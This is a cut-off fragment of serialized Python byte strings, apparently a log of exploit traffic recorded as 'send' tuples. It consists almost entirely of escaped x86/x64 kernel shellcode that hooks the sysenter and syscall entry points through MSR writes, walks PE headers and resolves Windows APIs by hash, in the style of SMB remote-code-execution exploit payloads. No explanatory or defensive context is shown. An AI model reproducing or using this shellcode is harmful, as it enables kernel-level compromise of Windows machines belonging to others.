'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 6, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\